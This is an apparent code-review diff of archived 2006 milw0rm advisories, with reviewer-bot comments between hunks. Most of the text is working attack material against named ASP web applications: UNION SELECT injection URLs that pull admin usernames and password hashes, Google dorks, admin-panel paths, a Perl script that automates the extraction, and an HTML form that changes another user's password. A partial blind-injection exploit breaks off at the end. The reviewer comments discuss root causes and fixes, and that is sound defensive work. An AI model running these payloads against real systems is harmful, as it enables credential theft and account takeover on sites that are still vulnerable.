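Review bot: "Vulnebrality" in the title line should read "Vulnerability"; the record otherwise carries no affected/fixed version or solution, and does not name the root cause, `id` in `default.asp` reaching the query unparameterised.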


@ -1,22 +1,22 @@
############################################################### ###############################################################
#Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability # #Spidey Blog Script <== 1.5 (tr) SQL Injection Vulnerability #
#Author : ASIANEAGLE # #Author : ASIANEAGLE #
#Site : www.asianeagle.org # #Site : www.asianeagle.org #
#Contact: admin@asianeagle.org # #Contact: admin@asianeagle.org #
############################################################### ###############################################################
#Risk : High #Risk : High
#Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar #Download Link Of Spidey Blog : http://www.aspindir.com/Kategoriler/ASP/bloglar
#Exploit; #Exploit;
#Admin Nick; #Admin Nick;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201 http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201
#Admin Password; #Admin Password;
http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201 http://[SITE]/[Spidey Blog Path]/proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201
#Greetz: Str0ke #Greetz: Str0ke
Forever milw0rm ;) Forever milw0rm ;)
# milw0rm.com [2006-08-14] # milw0rm.com [2006-08-14]
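Review bot: the two labels are swapped relative to the columns each URL selects: the URL under "#Admin Nick;" reads `sifre` (Turkish for password) and the one under "#Admin Password;" reads `kullanici_adi` (username), the reverse of the naming used consistently in the YenerTurk record above. The entry also lacks a solution line; the root cause is `pid` in `proje_goster.asp` being concatenated into the query.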


@ -1,27 +1,27 @@
################################################################################ ################################################################################
## ## ## ##
## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ## ## SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ## ## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ## ## Mail | ChironeX.FleckeriX@Gmail.Com ##
## Googledork | Powered By SimpleBlog 2.0 ## ## Googledork | Powered By SimpleBlog 2.0 ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ## ## ##
################################################################################ ################################################################################
############################################################################################################################################################ ############################################################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 # #Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
############################################################################################################################################################ ############################################################################################################################################################
########################################################### ###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp # #Admin Panel : http://www.target.com/path/admin/login.asp #
########################################################### ###########################################################
# milw0rm.com [2006-08-20] # milw0rm.com [2006-08-20]
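Review bot: every line in this hunk is marked as changed while the old and new text are identical, which points to a line-ending or trailing-whitespace normalization rather than a content change; the commit message should say so, otherwise the diff reads as an edit to the advisory text. The same pattern holds for the other hunks in this commit.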

@ -1,27 +1,27 @@
################################################################################ ################################################################################
## ## ## ##
## LBlog <= "comments.asp" SQL Injection Exploit ## ## LBlog <= "comments.asp" SQL Injection Exploit ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ## ## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ## ## Mail | ChironeX.FleckeriX@Gmail.Com ##
## Googledork | Powered By LBlog ## ## Googledork | Powered By LBlog ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ## ## ##
################################################################################ ################################################################################
################################################################################################################### ###################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 # #Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1 #
################################################################################################################### ###################################################################################################################
################################################# #################################################
#Admin Panel : http://www.target.com/path/admin # #Admin Panel : http://www.target.com/path/admin #
################################################# #################################################
# milw0rm.com [2006-08-20] # milw0rm.com [2006-08-20]

@ -1,16 +1,16 @@
#Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability #Muratsoft Haber Portal v3.6 (tr) SQL Injection Vulnerability
#Author : ASIANEAGLE #Author : ASIANEAGLE
#Site : www.asianeagle.org #Site : www.asianeagle.org
#Contact: admin@asianeagle.org #Contact: admin@asianeagle.org
#Link : http://www.aspindir.com/Goster/4350 #Link : http://www.aspindir.com/Goster/4350
#Demo Portal : http://www.muratsoft.com/haber/www/ #Demo Portal : http://www.muratsoft.com/haber/www/
#Price of Portal: 300YTL // Good money for Bad Script #Price of Portal: 300YTL // Good money for Bad Script
#Exploit : #Exploit :
www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201 www.site.com /[portal path]/kategori.asp?kat=-1%20union%20select%200,U_ADI,2,U_SIFRE,4,5,6,7,8,9,10,11,12,13,14%20from%20uyeler%20where%20U_ID%20like%201
#BURCU Seni hep sevdim hep sevicem. #BURCU Seni hep sevdim hep sevicem.
# milw0rm.com [2006-09-03] # milw0rm.com [2006-09-03]

@ -1,74 +1,74 @@
_ _ _ _
__ _(_)_ __ ___| |_ __ _ __ _(_)_ __ ___| |_ __ _
\ \ / / | '_ \/ __| __/ _` | \ \ / / | '_ \/ __| __/ _` |
\ V /| | |_) \__ \ || (_| | \ V /| | |_) \__ \ || (_| |
\_/ |_| .__/|___/\__\__,_| \_/ |_| .__/|___/\__\__,_|
|_| AnD |_| AnD
_ _ _ _ _ _ _ _ _ _
_ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____ _ __ ___ _ _ _ __ __| | ___ _ __ ___| | _(_) | |____
| '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ / | '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_ /
| | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ / | | | | | | |_| | | | (_| | __/ | \__ \ <| | | |/ /
|_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___| |_| |_| |_|\__,_|_| \__,_|\___|_| |___/_|\_\_|_|_/___|
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| Vipsta & MurderSkillz fucking pwnt this webApp | | Vipsta & MurderSkillz fucking pwnt this webApp |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| App Name: SimpleBlog 2.3 | | App Name: SimpleBlog 2.3 |
| App Author: 8pixel.net | | App Author: 8pixel.net |
| App Version: <= 2.3 | | App Version: <= 2.3 |
| App Type: Blog/Journal | | App Type: Blog/Journal |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| DETAILS | | DETAILS |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| Vulnerability: Remote SQL Injection | | Vulnerability: Remote SQL Injection |
| Requirements: Database with UNION support | | Requirements: Database with UNION support |
| Revisions: Note - This is a revision of another vuln | | Revisions: Note - This is a revision of another vuln |
| posted by Chironex Fleckeri | | posted by Chironex Fleckeri |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| CODE | | CODE |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| Vendor "implemented" a fix for SQL injection vulnerabilities. | | Vendor "implemented" a fix for SQL injection vulnerabilities. |
| however this bullshit was easily worked around by | | however this bullshit was easily worked around by |
| Vipsta & MurderSkillz. | | Vipsta & MurderSkillz. |
| | | |
| Vendor attempted to remove illegal characters like ' and = | | Vendor attempted to remove illegal characters like ' and = |
| which stop most SQL injection vulnerabilities. However: | | which stop most SQL injection vulnerabilities. However: |
| Vendor failed to remove '>' symbol. | | Vendor failed to remove '>' symbol. |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| EXPLOIT | | EXPLOIT |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| SQL Injection String: | | SQL Injection String: |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 | | http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| TIMELINE | | TIMELINE |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| 9/2/06 - Vendor Notified. | | 9/2/06 - Vendor Notified. |
| 9/2/06 - Vendor Replied. Threatens legal action. | | 9/2/06 - Vendor Replied. Threatens legal action. |
| 9/4/06 - Exploit Released with no details to vendor. | | 9/4/06 - Exploit Released with no details to vendor. |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| SHOUTZ | | SHOUTZ |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| Everyone at g00ns.net - including: | | Everyone at g00ns.net - including: |
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, | | z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, |
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, | | TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, |
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, | | JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, |
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot! | | ReysRaged, milf <3, gio, RedCoat, and all who I forgot! |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| ADDITIONAL NOTES | | ADDITIONAL NOTES |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| TeamSpeak: ts.g00ns.net | | TeamSpeak: ts.g00ns.net |
| IRC: irc.g00ns.net | | IRC: irc.g00ns.net |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| PERSONAL STUFF | | PERSONAL STUFF |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
| Sess from g00ns.net IS A FUCKING MORON. | | Sess from g00ns.net IS A FUCKING MORON. |
+-----------------------------------------------------------------+ +-----------------------------------------------------------------+
__ __
___ ___ / _| ___ ___ / _|
/ _ \/ _ \| |_ / _ \/ _ \| |_
| __/ (_) | _| | __/ (_) | _|
\___|\___/|_|. \___|\___/|_|.
# milw0rm.com [2006-09-04] # milw0rm.com [2006-09-04]
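Review bot: the CODE section (`Vendor attempted to remove illegal characters like ' and =` ... `Vendor failed to remove '>' symbol.`) is the only substantive detail in this entry and it should state the conclusion it implies: stripping characters from `id` leaves the query built by string concatenation, so any comparison operator the blacklist misses restores the injection, and the durable fix is to bind `id` as a query parameter or reject it unless it parses as an integer. Recording that lesson next to the timeline would make the entry useful to readers maintaining similar code.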

@ -1,23 +1,23 @@
################################################################################ ################################################################################
## ## ## ##
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ## ## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ## ## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ## ## Mail | ChironeX.FleckeriX@Gmail.Com ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ## ## ##
################################################################################ ################################################################################
########################################################################################################################################################## ##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins # #Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
########################################################################################################################################################## ##########################################################################################################################################################
########################################################################################################################################################## ##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins # #Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
########################################################################################################################################################## ##########################################################################################################################################################
################################################################ ################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp # #Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################ ################################################################
# milw0rm.com [2006-09-05] # milw0rm.com [2006-09-05]

@ -1,13 +1,13 @@
# BiyoSecurity.Org # BiyoSecurity.Org
# script name : TualBLOG v 1.0 # script name : TualBLOG v 1.0
# Risk : High # Risk : High
# Regards : Dj ReMix # Regards : Dj ReMix
# Thanks : Korsan , Liz0zim # Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp # Vulnerable file : icerik.asp
exp : exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1 http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
uyeno = 1 or 2( Admin ID ) uyeno = 1 or 2( Admin ID )
# milw0rm.com [2006-09-13] # milw0rm.com [2006-09-13]

@ -1,21 +1,21 @@
Vulnerability Report Vulnerability Report
******************************************************************************* *******************************************************************************
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability # Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Script Page : http://quadcomm.com # Script Page : http://quadcomm.com
# Exploit; # Exploit;
******************************************************************************* *******************************************************************************
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE] ###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
Example: Example:
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
# ajann,Turkey # ajann,Turkey
# ... # ...
# milw0rm.com [2006-09-17] # milw0rm.com [2006-09-17]
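Review bot: the injection point in this entry is the `OrderBy` parameter (`browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]`), and that deserves a sentence of its own because it is the case parameterized queries do not cover: a sort column or expression cannot be bound as a parameter, so the fix is a server-side allow-list that maps a small set of permitted sort keys to fixed column names and rejects anything else.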

@ -1,28 +1,28 @@
******************************************************************************* *******************************************************************************
# Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability # Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Dork : faqview.asp?key # Dork : faqview.asp?key
# Script Page : http://www.t-dreams.com # Script Page : http://www.t-dreams.com
# Exploit; # Exploit;
******************************************************************************* *******************************************************************************
###http://[target]/[path]/faqview.asp?key=[SQL HERE] ###http://[target]/[path]/faqview.asp?key=[SQL HERE]
Example: Example:
//faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin //faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin //faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin
With admin username and password take it,after join to login page: With admin username and password take it,after join to login page:
../[path]/admin/ ../[path]/admin/
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-09-17] # milw0rm.com [2006-09-17]

@ -1,23 +1,23 @@
******************************************************************************* *******************************************************************************
# Title : Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability # Title : Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Script Page : http://www.t-dreams.com # Script Page : http://www.t-dreams.com
# Exploit; # Exploit;
******************************************************************************* *******************************************************************************
###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE] ###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]
Example: Example:
ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18 ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18
Pls UserID Change(1,2,3,4,5.....) Pls UserID Change(1,2,3,4,5.....)
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not [Turkish]Hacker! # Im not [Turkish]Hacker!
# milw0rm.com [2006-09-17] # milw0rm.com [2006-09-17]

@ -1,18 +1,18 @@
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability + + Tekman Portal v1.0 (tr) SQL Injection Vulnerability +
+ Author : Fix TR + + Author : Fix TR +
+ Site : www.hack.gen.tr + + Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com + + Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/goster/4425 + Download: http://www.aspindir.com/goster/4425
+ Version : 1.0 + Version : 1.0
+ Bug In : uye_profil.asp + Bug In : uye_profil.asp
+ Risk : High + Risk : High
+ Exp. + Exp.
http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2 http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2
# milw0rm.com [2006-09-19] # milw0rm.com [2006-09-19]

@ -1,11 +1,11 @@
# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability # xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability
# Author : Muhacir # Author : Muhacir
# Source : http://www.aspindir.com/goster/4386 # Source : http://www.aspindir.com/goster/4386
# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler # Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler
# Greetz To : str0ke :) # Greetz To : str0ke :)
# milw0rm.com [2006-09-22] # milw0rm.com [2006-09-22]

@ -1,46 +1,46 @@
#!usr/bin/perl #!usr/bin/perl
#Author : gega #Author : gega
#Google : "Spidey Blog Script (c) v1.5" #Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit #SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com #Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org #Powered by e-hack.org
#Vulnerability by Asianeagle. #Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186 #Vulnerability Link : http://milw0rm.com/exploits/2186
use LWP::Simple; use LWP::Simple;
print "\n==============================\n"; print "\n==============================\n";
print "== Spidey Blog v1.5 ==\n"; print "== Spidey Blog v1.5 ==\n";
print "== Sql Injection Exploit ==\n"; print "== Sql Injection Exploit ==\n";
print "== Author : gega ==\n"; print "== Author : gega ==\n";
print "==============================\n\n"; print "==============================\n\n";
if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick')) if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
{ {
print "Usage : perl $0 [path] [function]\n"; print "Usage : perl $0 [path] [function]\n";
print "path ==> http://www.example.com/blog/\n"; print "path ==> http://www.example.com/blog/\n";
print "function ==> nick OR password\n"; print "function ==> nick OR password\n";
print "Example : perl $0 http://site.org/blog/ nick\n"; print "Example : perl $0 http://site.org/blog/ nick\n";
exit(0); exit(0);
} }
else else
{ {
if($ARGV[1] eq 'nick'){ if($ARGV[1] eq 'nick'){
$url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201]; $url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!"; $page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n"; print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n"; $page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1); } print "[-] Unable to retrieve username\n" if(!$1); }
else { else {
$code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201]; $code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!"; $page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n"; print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n"; $page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve password\n" if(!$1); print "[-] Unable to retrieve password\n" if(!$1);
} }
} }
#To Be Or Not To Be! #To Be Or Not To Be!
# milw0rm.com [2006-09-24] # milw0rm.com [2006-09-24]
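Review bot: the shebang `#!usr/bin/perl` on the first line is missing its leading slash and should be `#!/usr/bin/perl`. In the usage check, `!$ARGV[0]=~/http/` parses as `(!$ARGV[0]) =~ /http/` because `!` binds tighter than `=~`, so the intended scheme check never fires; `$ARGV[0] !~ /http/` is what was meant. Finally, testing `$1` after a failed match is fragile in general, since `$1` keeps the value of the last successful match; checking the match result directly avoids that.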

@ -1,18 +1,18 @@
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability + + iyzi Forum s1 b2 (tr) SQL Injection Vulnerability +
+ Author : Fix TR + + Author : Fix TR +
+ Site : www.hack.gen.tr + + Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com + + Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Download & Info: http://www.aspindir.com/Goster/2981 Download & Info: http://www.aspindir.com/Goster/2981
Bug In : uye_ayrinti.asp Bug In : uye_ayrinti.asp
Risk : High Risk : High
Exp: Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1 http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1
Password encrytped with SHA-256 Password encrytped with SHA-256
# milw0rm.com [2006-09-24] # milw0rm.com [2006-09-24]
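Review bot: `Password encrytped with SHA-256` has a typo and is also imprecise: SHA-256 is a hash function, not encryption, so the line should read that passwords are stored as SHA-256 hashes. Whether they are salted is not stated and is the detail that determines how much an exposed hash is worth, so it belongs in the entry if known.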

@ -1,38 +1,38 @@
<!-- <!--
# Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit # Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
# Author : ajann # Author : ajann
# Dork : "Forum Active Bulletin Board version 1.1 béta 2" # Dork : "Forum Active Bulletin Board version 1.1 béta 2"
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :) # Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
[Code]]] [Code]]]
--> -->
<html> <html>
<body bgcolor="#000000"> <body bgcolor="#000000">
<form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b> <form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b>
<font color="#FF0000" face="Verdana" size="2">Email: </font></b> <font color="#FF0000" face="Verdana" size="2">Email: </font></b>
<input type="text" name="Email" size="30" value="ajann@ajann.com"><br> <input type="text" name="Email" size="30" value="ajann@ajann.com"><br>
<font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font> <font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font>
<input type="text" name="Passe" size="30" value="123456"> <br> <input type="text" name="Passe" size="30" value="123456"> <br>
<input type="submit" value="Submit" name="Envoyer"> <input type="submit" value="Submit" name="Envoyer">
<input type="reset" value="Cancel" name="Effacer"> <input type="reset" value="Cancel" name="Effacer">
<input type="hidden" name="Id" value="42"> <input type="hidden" name="Id" value="42">
<input type="hidden" name="Nom" value="Administrateur"></p> <input type="hidden" name="Nom" value="Administrateur"></p>
</form> </form>
</body> </body>
</html> </html>
<!-- <!--
[/Code]]] [/Code]]]
Change: <input type="hidden" name="Id" value="42"> => ID Change: <input type="hidden" name="Id" value="42"> => ID
Change: <input type="hidden" name="Nom" value="Administrateur"> => UsrName Change: <input type="hidden" name="Nom" value="Administrateur"> => UsrName
Next to admin.asp Next to admin.asp
#ajann,Turkey #ajann,Turkey
#... #...
#Im Not Hacker! #Im Not Hacker!
--> -->
# milw0rm.com [2006-10-18] # milw0rm.com [2006-10-18]
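Review bot: the hidden fields `<input type="hidden" name="Id" value="42">` and `<input type="hidden" name="Nom" value="Administrateur">` are the whole bug, and the entry should name it: `doprofiledit.asp` takes the account to modify from the request body instead of from the authenticated session, so the fix is to derive the target user from the session and ignore any client-supplied `Id` or `Nom`. The `[Code]]]` and `[/Code]]]` lines are forum markup left in the file and add nothing to the advisory.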

@ -1,189 +1,189 @@
<% Response.Buffer = True %> <% Response.Buffer = True %>
<% On Error Resume Next %> <% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %> <% Server.ScriptTimeout = 100 %>
<% <%
'=============================================================================================== '===============================================================================================
'[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit '[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit
'[Coded by : ajann '[Coded by : ajann
'[Author : ajann '[Author : ajann
'[Contact : :( '[Contact : :(
'[ExploitName: exploit1.asp '[ExploitName: exploit1.asp
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ## '[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
'[Note : exploit file name =>exploit1.asp '[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click '[Using : Write Target and ID after Submit Click
'=============================================================================================== '===============================================================================================
%> %>
<html> <html>
<title>Berty Forum v1.4(index.php) Blind SQL Injection Exploit</title> <title>Berty Forum v1.4(index.php) Blind SQL Injection Exploit</title>
<head> <head>
<script language="JavaScript"> <script language="JavaScript">
function functionControl1(){ function functionControl1(){
setTimeout("functionControl2()",2000); setTimeout("functionControl2()",2000);
} }
function functionControl2(){ function functionControl2(){
if(document.form1.field1.value==""){ if(document.form1.field1.value==""){
